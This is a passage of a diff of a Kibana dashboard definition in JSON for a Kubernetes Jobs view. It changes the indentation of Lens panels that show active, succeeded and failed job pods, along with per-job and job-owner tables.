"sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "e4408339-1fa7-47b3-bac9-d2e7945d989f", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "9b261d2c-645a-4dca-9229-9d8c52e79b9f": { - "columnOrder": [ - "d65fee9a-8196-4bcf-b80f-af8eae9974ea", - "3bd09ac0-4718-47e1-abb4-54cbcf502e63" - ], - "columns": { - "3bd09ac0-4718-47e1-abb4-54cbcf502e63": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.job.pods.active\": *" - }, - "isBucketed": false, - "label": "Active", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.job.pods.active" - }, - "d65fee9a-8196-4bcf-b80f-af8eae9974ea": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.job.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.job.name" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "e4408339-1fa7-47b3-bac9-d2e7945d989f", - "key": "data_stream.dataset", - "negate": false, - "params": { - 
"query": "kubernetes.state_job" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_job" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "d65fee9a-8196-4bcf-b80f-af8eae9974ea", - "collapseFn": "sum", - "layerId": "9b261d2c-645a-4dca-9229-9d8c52e79b9f", - "layerType": "data", - "metricAccessor": "3bd09ac0-4718-47e1-abb4-54cbcf502e63" - } - }, - "title": "Active Job Pods [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.job.name" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "65805e20-7bb7-43ef-99de-fc56c3de6af2", - "w": 14, - "x": 0, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "65805e20-7bb7-43ef-99de-fc56c3de6af2", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "e4408339-1fa7-47b3-bac9-d2e7945d989f", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_job" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_job" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "d65fee9a-8196-4bcf-b80f-af8eae9974ea", + "collapseFn": "sum", + "layerId": "9b261d2c-645a-4dca-9229-9d8c52e79b9f", + "layerType": "data", + "metricAccessor": "3bd09ac0-4718-47e1-abb4-54cbcf502e63" + } }, - { - "embeddableConfig": { - "attributes": 
{ - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-8da4f091-8450-456a-8496-aab42ef0871a", - "type": "index-pattern" + "title": "Active Job Pods [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "65805e20-7bb7-43ef-99de-fc56c3de6af2", + "w": 14, + "x": 0, + "y": 4 + }, + "panelIndex": "65805e20-7bb7-43ef-99de-fc56c3de6af2", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-8da4f091-8450-456a-8496-aab42ef0871a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "25697353-2613-4360-89cc-900c9e265a10", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "8da4f091-8450-456a-8496-aab42ef0871a": { + "columnOrder": [ + "a7a7d706-d487-4ea4-ac4e-a52de432b629", + "8747afd9-3e1d-4da8-8f85-e3f526af747e" + ], + "columns": { + "8747afd9-3e1d-4da8-8f85-e3f526af747e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.job.pods.succeeded\": *" + }, + "isBucketed": false, + "label": "Succeeded", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.job.pods.succeeded" + }, + "a7a7d706-d487-4ea4-ac4e-a52de432b629": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.job.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": 
"ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "25697353-2613-4360-89cc-900c9e265a10", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "8da4f091-8450-456a-8496-aab42ef0871a": { - "columnOrder": [ - "a7a7d706-d487-4ea4-ac4e-a52de432b629", - "8747afd9-3e1d-4da8-8f85-e3f526af747e" - ], - "columns": { - "8747afd9-3e1d-4da8-8f85-e3f526af747e": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.job.pods.succeeded\": *" - }, - "isBucketed": false, - "label": "Succeeded", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.job.pods.succeeded" - }, - "a7a7d706-d487-4ea4-ac4e-a52de432b629": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.job.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.job.name" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "25697353-2613-4360-89cc-900c9e265a10", - "key": "data_stream.dataset", - "negate": false, 
- "params": { - "query": "kubernetes.state_job" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_job" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "a7a7d706-d487-4ea4-ac4e-a52de432b629", - "collapseFn": "sum", - "layerId": "8da4f091-8450-456a-8496-aab42ef0871a", - "layerType": "data", - "metricAccessor": "8747afd9-3e1d-4da8-8f85-e3f526af747e" - } - }, - "title": "Succeeded Job Pods [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.job.name" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "9ecfd540-d36f-4869-836d-3dd704a6561f", - "w": 14, - "x": 17, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "9ecfd540-d36f-4869-836d-3dd704a6561f", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "25697353-2613-4360-89cc-900c9e265a10", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_job" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_job" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "a7a7d706-d487-4ea4-ac4e-a52de432b629", + "collapseFn": "sum", + "layerId": "8da4f091-8450-456a-8496-aab42ef0871a", + "layerType": "data", + "metricAccessor": "8747afd9-3e1d-4da8-8f85-e3f526af747e" + } }, - { - 
"embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-81a3cd5d-50e5-4e31-b736-000de1673372", - "type": "index-pattern" + "title": "Succeeded Job Pods [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "9ecfd540-d36f-4869-836d-3dd704a6561f", + "w": 14, + "x": 17, + "y": 4 + }, + "panelIndex": "9ecfd540-d36f-4869-836d-3dd704a6561f", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-81a3cd5d-50e5-4e31-b736-000de1673372", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f5e0f998-307f-48b5-8a3d-a8ce10058dbd", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "81a3cd5d-50e5-4e31-b736-000de1673372": { + "columnOrder": [ + "d373cc02-b4ba-4cb3-a0b1-da41564d4a96", + "9fd1fc3c-2013-4d03-9107-b03512a8f7dd" + ], + "columns": { + "9fd1fc3c-2013-4d03-9107-b03512a8f7dd": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.job.pods.failed\": *" + }, + "isBucketed": false, + "label": "Failed", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.job.pods.failed" + }, + "d373cc02-b4ba-4cb3-a0b1-da41564d4a96": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.job.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", 
+ "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "f5e0f998-307f-48b5-8a3d-a8ce10058dbd", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "81a3cd5d-50e5-4e31-b736-000de1673372": { - "columnOrder": [ - "d373cc02-b4ba-4cb3-a0b1-da41564d4a96", - "9fd1fc3c-2013-4d03-9107-b03512a8f7dd" - ], - "columns": { - "9fd1fc3c-2013-4d03-9107-b03512a8f7dd": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.job.pods.failed\": *" - }, - "isBucketed": false, - "label": "Failed", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.job.pods.failed" - }, - "d373cc02-b4ba-4cb3-a0b1-da41564d4a96": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.job.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.job.name" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "f5e0f998-307f-48b5-8a3d-a8ce10058dbd", - "key": "data_stream.dataset", - 
"negate": false, - "params": { - "query": "kubernetes.state_job" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_job" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "d373cc02-b4ba-4cb3-a0b1-da41564d4a96", - "collapseFn": "sum", - "layerId": "81a3cd5d-50e5-4e31-b736-000de1673372", - "layerType": "data", - "metricAccessor": "9fd1fc3c-2013-4d03-9107-b03512a8f7dd" - } - }, - "title": "Failed Job Pods [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.job.name" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "c73b7420-ce63-4d11-b25e-387c7c76b9f1", - "w": 14, - "x": 34, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "c73b7420-ce63-4d11-b25e-387c7c76b9f1", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "f5e0f998-307f-48b5-8a3d-a8ce10058dbd", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_job" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_job" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "d373cc02-b4ba-4cb3-a0b1-da41564d4a96", + "collapseFn": "sum", + "layerId": "81a3cd5d-50e5-4e31-b736-000de1673372", + "layerType": "data", + "metricAccessor": "9fd1fc3c-2013-4d03-9107-b03512a8f7dd" + } }, - { - 
"embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-77c778d8-1664-4062-b5ff-7bbc982f49d2", - "type": "index-pattern" + "title": "Failed Job Pods [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "c73b7420-ce63-4d11-b25e-387c7c76b9f1", + "w": 14, + "x": 34, + "y": 4 + }, + "panelIndex": "c73b7420-ce63-4d11-b25e-387c7c76b9f1", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-77c778d8-1664-4062-b5ff-7bbc982f49d2", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "29baa5ec-91df-42a8-8d21-3c3adaa47202", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "77c778d8-1664-4062-b5ff-7bbc982f49d2": { + "columnOrder": [ + "33f00b6c-023d-4b71-98c5-7c5a56d3b9d8", + "00c2aa45-0e8c-4f29-a478-4b8dbf419472", + "8163b6c0-69e0-4e8f-9c21-6878a2e5e8e1", + "b1e6a372-87f5-44cd-b0c3-132f94a4a860" + ], + "columns": { + "00c2aa45-0e8c-4f29-a478-4b8dbf419472": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Completions Desired", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } }, - { - "id": "metrics-*", - "name": "29baa5ec-91df-42a8-8d21-3c3adaa47202", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "77c778d8-1664-4062-b5ff-7bbc982f49d2": { - "columnOrder": [ - "33f00b6c-023d-4b71-98c5-7c5a56d3b9d8", - "00c2aa45-0e8c-4f29-a478-4b8dbf419472", - "8163b6c0-69e0-4e8f-9c21-6878a2e5e8e1", - "b1e6a372-87f5-44cd-b0c3-132f94a4a860" - ], - "columns": { - "00c2aa45-0e8c-4f29-a478-4b8dbf419472": { - "customLabel": true, - 
"dataType": "number", - "isBucketed": false, - "label": "Completions Desired", - "operationType": "last_value", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.job.completions.desired" - }, - "33f00b6c-023d-4b71-98c5-7c5a56d3b9d8": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Job Name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.job.name" - }, - "8163b6c0-69e0-4e8f-9c21-6878a2e5e8e1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Parallelism Desired", - "operationType": "last_value", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.job.parallelism.desired" - }, - "b1e6a372-87f5-44cd-b0c3-132f94a4a860": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Completed", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.job.status.complete" - } - }, - "incompleteColumns": {} - } - } - } + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.job.completions.desired" + }, + "33f00b6c-023d-4b71-98c5-7c5a56d3b9d8": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Job Name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": 
"appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "29baa5ec-91df-42a8-8d21-3c3adaa47202", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_job" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_job" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "columns": [ - { - "columnId": "33f00b6c-023d-4b71-98c5-7c5a56d3b9d8", - "isTransposed": false - }, - { - "columnId": "00c2aa45-0e8c-4f29-a478-4b8dbf419472", - "isTransposed": false - }, - { - "columnId": "8163b6c0-69e0-4e8f-9c21-6878a2e5e8e1", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "b1e6a372-87f5-44cd-b0c3-132f94a4a860", - "isTransposed": false - } - ], - "layerId": "77c778d8-1664-4062-b5ff-7bbc982f49d2", - "layerType": "data", - "rowHeight": "single", - "rowHeightLines": 1 - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.job.name" }, - "title": "Informations per Job [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsDatatable" + "8163b6c0-69e0-4e8f-9c21-6878a2e5e8e1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Parallelism Desired", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } + }, + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.job.parallelism.desired" + }, + "b1e6a372-87f5-44cd-b0c3-132f94a4a860": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Completed", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.job.status.complete" + } + }, + "incompleteColumns": {} 
+ } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "29baa5ec-91df-42a8-8d21-3c3adaa47202", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_job" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 17, - "i": "574d76e2-ca20-4c75-9dac-31265a772ba5", - "w": 24, - "x": 0, - "y": 11 - }, - "panelIndex": "574d76e2-ca20-4c75-9dac-31265a772ba5", - "title": "Informations per Job [Metrics Kubernetes]", - "type": "lens", - "version": "8.10.2" + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_job" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "33f00b6c-023d-4b71-98c5-7c5a56d3b9d8", + "isTransposed": false + }, + { + "columnId": "00c2aa45-0e8c-4f29-a478-4b8dbf419472", + "isTransposed": false + }, + { + "columnId": "8163b6c0-69e0-4e8f-9c21-6878a2e5e8e1", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "b1e6a372-87f5-44cd-b0c3-132f94a4a860", + "isTransposed": false + } + ], + "layerId": "77c778d8-1664-4062-b5ff-7bbc982f49d2", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-36fb858f-bcf8-4256-9880-37297f1189ce", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "aee28695-ee4d-4930-9118-c4b39cea9c2c", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "36fb858f-bcf8-4256-9880-37297f1189ce": { - "columnOrder": [ - "2566280d-0419-4eaa-97e7-f8a6c76da734", - "70dcbe16-f977-46bb-a8ae-9e0067232d5e", - "6822f9cc-97ef-41b2-bebb-5444626e2a4f" - ], - "columns": { - "2566280d-0419-4eaa-97e7-f8a6c76da734": { - 
"customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Job Name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.job.name" - }, - "6822f9cc-97ef-41b2-bebb-5444626e2a4f": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Owner Kind", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.job.owner.kind" - }, - "70dcbe16-f977-46bb-a8ae-9e0067232d5e": { - "customLabel": true, - "dataType": "string", - "isBucketed": false, - "label": "Owner Name", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.job.owner.name" - } - }, - "incompleteColumns": {} - } - } - } + "title": "Informations per Job [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 17, + "i": "574d76e2-ca20-4c75-9dac-31265a772ba5", + "w": 24, + "x": 0, + "y": 11 + }, + "panelIndex": "574d76e2-ca20-4c75-9dac-31265a772ba5", + "title": "Informations per Job [Metrics Kubernetes]", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-36fb858f-bcf8-4256-9880-37297f1189ce", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "aee28695-ee4d-4930-9118-c4b39cea9c2c", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "36fb858f-bcf8-4256-9880-37297f1189ce": { + "columnOrder": [ + 
"2566280d-0419-4eaa-97e7-f8a6c76da734", + "70dcbe16-f977-46bb-a8ae-9e0067232d5e", + "6822f9cc-97ef-41b2-bebb-5444626e2a4f" + ], + "columns": { + "2566280d-0419-4eaa-97e7-f8a6c76da734": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Job Name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "aee28695-ee4d-4930-9118-c4b39cea9c2c", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_job" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_job" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "columns": [ - { - "columnId": "2566280d-0419-4eaa-97e7-f8a6c76da734", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "70dcbe16-f977-46bb-a8ae-9e0067232d5e", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "6822f9cc-97ef-41b2-bebb-5444626e2a4f", - "isTransposed": false - } - ], - "layerId": "36fb858f-bcf8-4256-9880-37297f1189ce", - "layerType": "data", - "rowHeight": "single", - "rowHeightLines": 1 - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.job.name" + }, + "6822f9cc-97ef-41b2-bebb-5444626e2a4f": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Owner Kind", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.job.owner.kind" }, - "title": "Job Owner Informations [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsDatatable" + "70dcbe16-f977-46bb-a8ae-9e0067232d5e": { + 
"customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Owner Name", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.job.owner.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "aee28695-ee4d-4930-9118-c4b39cea9c2c", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_job" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 17, - "i": "2bb97a71-28ce-428d-99d1-01b1918aebf5", - "w": 24, - "x": 24, - "y": 11 - }, - "panelIndex": "2bb97a71-28ce-428d-99d1-01b1918aebf5", - "title": "Job Owner Informations [Metrics Kubernetes]", - "type": "lens", - "version": "8.10.2" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] Jobs", - "version": 1 - }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-31T12:43:10.962Z", - "id": "kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013", - "managed": false, - "references": [ - { - "id": "metrics-*", - "name": "65805e20-7bb7-43ef-99de-fc56c3de6af2:indexpattern-datasource-layer-9b261d2c-645a-4dca-9229-9d8c52e79b9f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "65805e20-7bb7-43ef-99de-fc56c3de6af2:e4408339-1fa7-47b3-bac9-d2e7945d989f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "9ecfd540-d36f-4869-836d-3dd704a6561f:indexpattern-datasource-layer-8da4f091-8450-456a-8496-aab42ef0871a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "9ecfd540-d36f-4869-836d-3dd704a6561f:25697353-2613-4360-89cc-900c9e265a10", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "c73b7420-ce63-4d11-b25e-387c7c76b9f1:indexpattern-datasource-layer-81a3cd5d-50e5-4e31-b736-000de1673372", - "type": "index-pattern" - }, - { - "id": "metrics-*", 
